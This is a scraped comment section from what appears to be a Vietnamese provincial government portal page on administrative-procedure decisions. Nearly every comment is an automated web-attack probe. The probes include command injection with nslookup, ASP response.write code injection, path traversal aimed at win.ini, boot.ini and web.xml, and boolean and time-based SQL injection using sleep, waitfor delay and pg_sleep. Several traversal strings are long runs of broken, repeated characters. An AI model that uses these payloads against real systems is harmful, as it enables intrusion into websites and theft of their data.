Liên kết website
Bản đồ hành chính
ban do bac ho Cổng thông tin điện tửTỉnh Khánh HòaCổng thông tin điện tử tỉnh Khánh HòaCổng thông tin điện tử chính phủHệ thống vb pháp luậtTruong xa
Thống kê truy cập
Văn hóa - Xã Hội

quyết định ban hành CCHHC

quyết định ban hành CCHHC
quyết định ban hành CCHHC

quyết định ban hành CCHHC 

Họ tên*
Email*
Bình luận*
wuhraxep
7/6/2017 5:42:05 AM

set|set&set

wuhraxep
7/6/2017 5:42:08 AM

$(nslookup 34MB88vb)

wuhraxep
7/6/2017 5:42:15 AM

&nslookup RgLDlcFL&'\"`0&nslookup RgLDlcFL&`'

afxojvvh
7/6/2017 5:42:22 AM

G4ByQOkO

ltjeauqs
7/6/2017 5:42:34 AM

response.write(9676733*9346710)

ltjeauqs
7/6/2017 5:42:43 AM

'+response.write(9676733*9346710)+'

ltjeauqs
7/6/2017 5:42:48 AM

"+response.write(9676733*9346710)+"

afxojvvh
7/6/2017 5:43:04 AM

fWTdatvV

fwrmxvla
7/6/2017 5:43:58 AM

../../../../../../../../../../windows/win.ini

afxojvvh
7/6/2017 5:44:01 AM

rPnutfeO

fwrmxvla
7/6/2017 5:44:18 AM

../../../../../../../../../../boot.ini

wuhraxep
7/6/2017 5:44:23 AM

set|set&set

afxojvvh
7/6/2017 5:44:28 AM

BB6SshRk

fwrmxvla
7/6/2017 5:44:36 AM

../../../../../../../../../../windows/win.ini.jpg

wuhraxep
7/6/2017 5:44:38 AM

$(nslookup IAhllmQ7)

fwrmxvla
7/6/2017 5:44:49 AM

������������������������������������������������windows��win.ini

wuhraxep
7/6/2017 5:44:53 AM

&nslookup moQLjE9M&'\"`0&nslookup moQLjE9M&`'

ltjeauqs
7/6/2017 5:45:03 AM

response.write(9658347*9134195)

ltjeauqs
7/6/2017 5:45:06 AM

'+response.write(9658347*9134195)+'

afxojvvh
7/6/2017 5:45:09 AM

IrmFeaZQ

ltjeauqs
7/6/2017 5:45:10 AM

"+response.write(9658347*9134195)+"

fwrmxvla
7/6/2017 5:45:22 AM

................windowswin.ini

afxojvvh
7/6/2017 5:45:23 AM

t588ulgJ

fwrmxvla
7/6/2017 5:45:31 AM

................windowswin.ini

fwrmxvla
7/6/2017 5:45:35 AM

..\..\..\..\..\..\..\..\windows\win.ini

fwrmxvla
7/6/2017 5:45:48 AM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

fwrmxvla
7/6/2017 5:46:04 AM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

afxojvvh
7/6/2017 5:46:08 AM

sswMe3dX

fwrmxvla
7/6/2017 5:46:15 AM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

afxojvvh
7/6/2017 5:46:23 AM

rdjUB0oJ

fwrmxvla
7/6/2017 5:46:33 AM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

fwrmxvla
7/6/2017 5:46:38 AM

WEB-INF/web.xml

fwrmxvla
7/6/2017 5:46:44 AM

WEB-INF\web.xml

ltjeauqs
7/6/2017 5:46:57 AM

response.write(9735808*9110977)

ltjeauqs
7/6/2017 5:47:01 AM

'+response.write(9735808*9110977)+'

ltjeauqs
7/6/2017 5:47:08 AM

"+response.write(9735808*9110977)+"

afxojvvh
7/6/2017 5:47:09 AM

Inex4PgX

wuhraxep
7/6/2017 5:47:12 AM

set|set&set

wuhraxep
7/6/2017 5:47:18 AM

$(nslookup zcMTFZ29)

sknkcrdc
7/6/2017 5:47:32 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

sknkcrdc
7/6/2017 5:47:40 AM

%26%23221;%20ki%e1%ba%bfn%20c%e1%bb%a7a%20b%e1%ba%a1n

wuhraxep
7/6/2017 5:47:42 AM

&nslookup JPkFuxxG&'\"`0&nslookup JPkFuxxG&`'

sknkcrdc
7/6/2017 5:47:44 AM

-1 OR 2+397-397-1=0+0+0+1 --

sknkcrdc
7/6/2017 5:47:48 AM

-1 OR 3+397-397-1=0+0+0+1 --

sknkcrdc
7/6/2017 5:48:03 AM

-1 OR 3*2<(0+5+397-397) --

ltjeauqs
7/6/2017 5:48:18 AM

response.write(9641897*9417605)

ltjeauqs
7/6/2017 5:48:22 AM

'+response.write(9641897*9417605)+'

ltjeauqs
7/6/2017 5:48:25 AM

"+response.write(9641897*9417605)+"

sknkcrdc
7/6/2017 5:48:29 AM

-1 OR 3*2>(0+5+397-397) --

sknkcrdc
7/6/2017 5:48:49 AM

-1 OR 2+940-940-1=0+0+0+1

sknkcrdc
7/6/2017 5:49:21 AM

-1 OR 3+940-940-1=0+0+0+1

sknkcrdc
7/6/2017 5:49:31 AM

-1 OR 3+940-940-1=0+0+0+1

sknkcrdc
7/6/2017 5:49:42 AM

-1 OR 3*2<(0+5+940-940)

wuhraxep
7/6/2017 5:49:44 AM

set|set&set

sknkcrdc
7/6/2017 5:49:46 AM

-1 OR 3*2>(0+5+940-940)

wuhraxep
7/6/2017 5:49:49 AM

$(nslookup Dzg1nk52)

sknkcrdc
7/6/2017 5:49:57 AM

-1' OR 2+580-580-1=0+0+0+1 --

ltjeauqs
7/6/2017 5:49:59 AM

response.write(9619990*9779078)

sknkcrdc
7/6/2017 5:50:00 AM

-1' OR 3+580-580-1=0+0+0+1 --

ltjeauqs
7/6/2017 5:50:02 AM

'+response.write(9619990*9779078)+'

ltjeauqs
7/6/2017 5:50:09 AM

"+response.write(9619990*9779078)+"

wuhraxep
7/6/2017 5:50:17 AM

&nslookup fsqWonkP&'\"`0&nslookup fsqWonkP&`'

sknkcrdc
7/6/2017 5:50:24 AM

-1' OR 3*2<(0+5+580-580) --

sknkcrdc
7/6/2017 5:50:37 AM

-1' OR 3*2>(0+5+580-580) --

sknkcrdc
7/6/2017 5:50:44 AM

-1' OR 2+428-428-1=0+0+0+1 or '2REzB722'='

sknkcrdc
7/6/2017 5:50:46 AM

-1' OR 3+428-428-1=0+0+0+1 or '2REzB722'='

sknkcrdc
7/6/2017 5:50:56 AM

-1' OR 3*2<(0+5+428-428) or '2REzB722'='

sknkcrdc
7/6/2017 5:51:29 AM

-1' OR 3*2>(0+5+428-428) or '2REzB722'='

sknkcrdc
7/6/2017 5:51:32 AM

-1' OR 3*2>(0+5+428-428) or '2REzB722'='

sknkcrdc
7/6/2017 5:51:55 AM

-1" OR 2+136-136-1=0+0+0+1 --

sknkcrdc
7/6/2017 5:52:00 AM

-1" OR 3+136-136-1=0+0+0+1 --

sknkcrdc
7/6/2017 5:52:07 AM

-1" OR 3*2<(0+5+136-136) --

sknkcrdc
7/6/2017 5:52:14 AM

-1" OR 3*2>(0+5+136-136) --

sknkcrdc
7/6/2017 5:52:27 AM

if(now()=sysdate(),sleep(32.61),0)/*'XOR(if(now()=sysdate(),sleep(32.61),0))OR'"XOR(if(now()=sysdate(),sleep(32.61),0))OR"*/

sknkcrdc
7/6/2017 5:52:44 AM

(select(0)from(select(sleep(32.61)))v)/*'+(select(0)from(select(sleep(32.61)))v)+'"+(select(0)from(select(sleep(32.61)))v)+"*/

sknkcrdc
7/6/2017 5:52:52 AM

1 waitfor delay '0:0:48.915' --

ltjeauqs
7/6/2017 5:52:58 AM

response.write(9922397*9574938)

ltjeauqs
7/6/2017 5:53:01 AM

'+response.write(9922397*9574938)+'

wuhraxep
7/6/2017 5:53:13 AM

set|set&set

ltjeauqs
7/6/2017 5:53:16 AM

"+response.write(9922397*9574938)+"

sknkcrdc
7/6/2017 5:53:17 AM

VOLYccJu'; waitfor delay '0:0:48.915' --

sknkcrdc
7/6/2017 5:53:20 AM

sHWmY0zx'); waitfor delay '0:0:48.915' --

fwrmxvla
7/6/2017 5:53:24 AM

../../../../../../../../../../windows/win.ini

sknkcrdc
7/6/2017 5:53:27 AM

4TfUC9xk')); waitfor delay '0:0:48.915' --

wuhraxep
7/6/2017 5:53:28 AM

$(nslookup oMvxCCsq)

fwrmxvla
7/6/2017 5:53:36 AM

../../../../../../../../../../boot.ini

sknkcrdc
7/6/2017 5:53:41 AM

f3c9303g';select pg_sleep(48.915); --

sknkcrdc
7/6/2017 5:53:44 AM

Js5wNZP9');select pg_sleep(48.915); --

fwrmxvla
7/6/2017 5:53:46 AM

../../../../../../../../../../windows/win.ini.jpg

fwrmxvla
7/6/2017 5:53:51 AM

������������������������������������������������windows��win.ini

wuhraxep
7/6/2017 5:53:55 AM

&nslookup vMNJ9wP1&'\"`0&nslookup vMNJ9wP1&`'

fwrmxvla
7/6/2017 5:53:57 AM

................windowswin.ini

fwrmxvla
7/6/2017 5:54:01 AM

..\..\..\..\..\..\..\..\windows\win.ini

sknkcrdc
7/6/2017 5:54:13 AM

rpudGz8s'));select pg_sleep(0); --

fwrmxvla
7/6/2017 5:54:18 AM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

fwrmxvla
7/6/2017 5:54:28 AM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

sknkcrdc
7/6/2017 5:54:32 AM

J9a6yTgj'));select pg_sleep(16.305); --

fwrmxvla
7/6/2017 5:54:43 AM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

fwrmxvla
7/6/2017 5:54:50 AM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

fwrmxvla
7/6/2017 5:54:58 AM

WEB-INF/web.xml

fwrmxvla
7/6/2017 5:55:17 AM

WEB-INF\web.xml

ltjeauqs
7/6/2017 5:55:21 AM

response.write(9601245*9532475)

ltjeauqs
7/6/2017 5:55:24 AM

'+response.write(9601245*9532475)+'

ltjeauqs
7/6/2017 5:55:30 AM

"+response.write(9601245*9532475)+"

wuhraxep
7/6/2017 5:56:06 AM

set|set&set

wuhraxep
7/6/2017 5:56:24 AM

$(nslookup 1f2v85um)

wuhraxep
7/6/2017 5:56:50 AM

&nslookup W4EGuCdD&'\"`0&nslookup W4EGuCdD&`'

ltjeauqs
7/6/2017 5:56:56 AM

response.write(9095799*9953183)

ltjeauqs
7/6/2017 5:57:19 AM

'+response.write(9095799*9953183)+'

ltjeauqs
7/6/2017 5:57:59 AM

"+response.write(9095799*9953183)+"

ltjeauqs
7/6/2017 5:58:00 AM

"+response.write(9095799*9953183)+"

wuhraxep
7/6/2017 5:58:21 AM

set|set&set

wuhraxep
7/6/2017 5:58:26 AM

$(nslookup esBPJNz0)

wuhraxep
7/6/2017 5:58:31 AM

&nslookup oCbT0FyV&'\"`0&nslookup oCbT0FyV&`'

ltjeauqs
7/6/2017 6:00:18 AM

response.write(9370146*9632651)

ltjeauqs
7/6/2017 6:00:32 AM

'+response.write(9370146*9632651)+'

wuhraxep
7/6/2017 6:00:36 AM

set|set&set

ltjeauqs
7/6/2017 6:00:44 AM

"+response.write(9370146*9632651)+"

wuhraxep
7/6/2017 6:00:46 AM

$(nslookup FeU1Zfbc)

wuhraxep
7/6/2017 6:00:50 AM

&nslookup M4Ko3mwz&'\"`0&nslookup M4Ko3mwz&`'

fwrmxvla
7/6/2017 6:02:31 AM

../../../../../../../../../../windows/win.ini

fwrmxvla
7/6/2017 6:02:36 AM

../../../../../../../../../../boot.ini

fwrmxvla
7/6/2017 6:02:43 AM

../../../../../../../../../../windows/win.ini.jpg

fwrmxvla
7/6/2017 6:02:49 AM

������������������������������������������������windows��win.ini

fwrmxvla
7/6/2017 6:02:56 AM

................windowswin.ini

fwrmxvla
7/6/2017 6:03:06 AM

..\..\..\..\..\..\..\..\windows\win.ini

fwrmxvla
7/6/2017 6:03:32 AM

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

wuhraxep
7/6/2017 6:03:35 AM

set|set&set

fwrmxvla
7/6/2017 6:03:37 AM

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

wuhraxep
7/6/2017 6:03:44 AM

$(nslookup Hsujtwlg)

fwrmxvla
7/6/2017 6:03:45 AM

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

wuhraxep
7/6/2017 6:03:56 AM

&nslookup oXCSvqFY&'\"`0&nslookup oXCSvqFY&`'

fwrmxvla
7/6/2017 6:04:07 AM

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.